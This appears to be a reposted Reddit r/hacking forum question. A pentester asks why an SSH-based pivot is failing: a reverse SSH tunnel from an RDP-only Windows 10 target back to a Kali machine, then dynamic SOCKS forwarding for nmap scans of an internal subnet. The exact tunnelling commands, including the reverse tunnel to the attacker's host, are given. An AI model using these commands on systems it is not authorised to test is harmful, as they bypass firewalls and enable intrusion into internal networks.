Hello r/hacking!
I'm really stumped on this networking issue, so I'm outsourcing help to internet strangers!
I'm doing a pentest, and I need help with tunneling traffic into a subnet using a windows machine that I only (initially) had RDP access to.
I have a box that I'm hosting an SSH server on, the attacking machine linux, and the target machine, windows 10, running RDP.
All incoming traffic to the Windows server is blocked my a firewall with the exception of RDP.
I downloaded this OpenSSH for Windows, and started the service. I then ran:
C:\>ssh -i key.pem -R 4545:localhost:22 [kali@kali.machine.ip](mailto:kali@kali.machine.ip)
On the kali machine, I can now access the SSH server running on the Windows machine.
I tried to do dynamic port forwarding like this:
ssh -D 4547 -N -f [WindowsUser@127.0.0.1](mailto:WindowsUser@127.0.0.1) -p 4545 -v
To no avail. I can't route traffic to that subnet using this method when I kick off nmap scans with the --proxy option, and I can't do local nmap scans or connect to ports running on the windows machine. What am I doing wrong?
and also tried using https://github.com/sshuttle/sshuttle, but sshuttle encountered errors with Windows 10 servers as hop servers, not sure if its made for Windows.
Any tips? Thank you so much!
[link] [comments]
from hacking: security in practice https://ift.tt/36lGTd7
Comments
Post a Comment